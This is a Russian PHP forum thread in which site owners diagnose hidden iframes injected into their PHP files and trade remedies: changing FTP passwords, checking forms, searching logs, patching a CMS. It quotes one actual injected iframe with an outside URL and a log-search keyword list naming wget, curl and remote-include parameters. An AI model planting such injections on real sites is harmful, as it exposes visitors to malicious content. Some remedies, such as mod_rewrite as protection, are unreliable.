Какой тип атаки и как с ним бороться

Ezh

Новичок
Какой тип атаки и как с ним бороться

Привет всем!
Кто может помочь в файле index.php появилась строка:
<!-- ~ --><iframe src="url непонятно куда" width=1 height=1></iframe><!-- ~ -->

Если это атака то как с ней бороться
 

Ezh

Новичок
Перестала правильно отображаться главная страница
 

Vladson

Сильнобухер
Это не атака, это либо дыра позволяющая злоумышленнику ВСЁ что можно, либо у вас украли пароль к FTP что в принципе не менее опасно (а может даже и более)
 

AmdY

Пью пиво
Команда форума
Попытайся расписать с вой вопрос, укажи что за скрипт, что он делал.
Здезь же не телепаты сидят.
 

jonjonson

Охренеть
Ezh, смарти в проекте используется?

Фанат, сталкивался примерно с тем же. В привате особого смысла не вижу. Код был такой...
PHP:
<iframe src='http://www.snooztime.com/_vti/index.php' style=width:100;height:100;visibility:none;border:1></iframe>
Вставлен был в темплейт смарти. Предполагали тоже, что утечка пароля ftp.
 

Апокалипсис

тех дир matras.ru
Там была непонятная ссылка которая неск. раз переадресовывалась неизвестно куда:D, а если id у неё стереть, попадаешь на порно сайт, поэтому затёр, малоли:)
Ezh
попробуй сменить пароль, проверяй скрипт, может у тебя идет где запись в файл криво, и хакер просто "подставил" index.php

-~{}~ 24.02.07 05:19:

Ezh
В скрипте больше кроме вышеуказанной строки ничего нет?
 

Ezh

Новичок
Спасибо разобрались, а если украли пароль то положили бы весь сервак
 

Gorynych

Посетитель PHP-Клуба
Ezh

сталкивался с такими вкраплениями кода на сайтах, под управлением не пропатченных публичных CMS. Часто такие "вкрапления" используются для загрузки javascript-сода и/или показа на сайте баннеров порно- и игровых сайтов

на всякий случай посмотрите логи обращения к серверу, не фигурируют ли в GET запросах фигурируют параметры или значения, содержащие ключевые слова:

_REQUEST, GLOBALS, &cmd, absolute_path=http, perl, lynx, wget, curl, lwp, service=Echo, .pl

если сайт бозируется на публичной CMS - как минимум, обновите версию.

-~{}~ 24.02.07 23:36:

кстати, именно сервак вряд ли бы клали, а вот не посадили ли вам какого-нибудь демона, допускающего консольный вход на сервер - я бы проверил (посмотрите список запущенных процессов и прежде всего обратите внимание на то, нет ли запущенных perl-сценариев)
 

Ezh

Новичок
Привет, всем извините, что заставил всех ждать.
Первое, что сделали сменили атрибуты файлов, второе на всякий случай сменили пароли доступа через ftp, сайт был без cms. А вот проверку в одной из форм просто пропустили. А демонов пусть хостинг провайдер ловит :)

-~{}~ 10.03.07 22:10:

Сейчас пишу сайт с использовнием модуля mod_rewrite, вроде как супер спасение от взлома и url чистые получаются
 

зверек

Новичок
Похожая фигня.
К php-файлам прикручивается ява-скрипт, который открывает всякую порнушку.
Как только обнаружили, первым делом проделали все, что рекомендуется в частности на этом форуме в похожих темах: избавились от totalcommander, сменили ftp пароль. Ситуация не изменилась. Вообще перестали хранить пароль на компе. Не помогло :(
Скрипт пишется в основном в footer.php, иногда в header.php Один раз в index.php В этих файлах нет никаких форм, вообще никакого интерактива, чисто запросы к бд и выводы. К тому же используется mod_rewrite (выше кто-то сказал, что это само по себе защищает сайт..не знаю так ли это, просто перечисляю всю инфу для полноты)

Вот что делать??? Дыра какая-то? А как ее искать?
Хелп, плиз!!!
 

kruglov

Новичок
Может ли php писать в эти файлы (он запускается под апачем или под полььзователем)?
 

зверек

Новичок
Автор оригинала: kruglov
Может ли php писать в эти файлы (он запускается под апачем или под полььзователем)?
php как модуль апача установлен... Или Вы что-то другое имеете в виду?

-~{}~ 29.09.08 16:38:

Да, еще пытались выставлять атрибуты этим файлам (куда скрипт прописывается) "только чтение". Но это не помогает. Все равно каким-то образом осуществляется взлом, атрибуты при этом меняются.
 

зверек

Новичок
что записать? куда записать?
Извините, не очень понимаю, что имеется в виду?
 

Dovg

Продвинутый новичок
это вирус, который ворует пароли от ftp из totall commandera и похожих.
на фтп ищет index.(php|html|...)

в 99% случаев лечится сменой паролей от фтп и хорошим антивирусом.
 
Сверху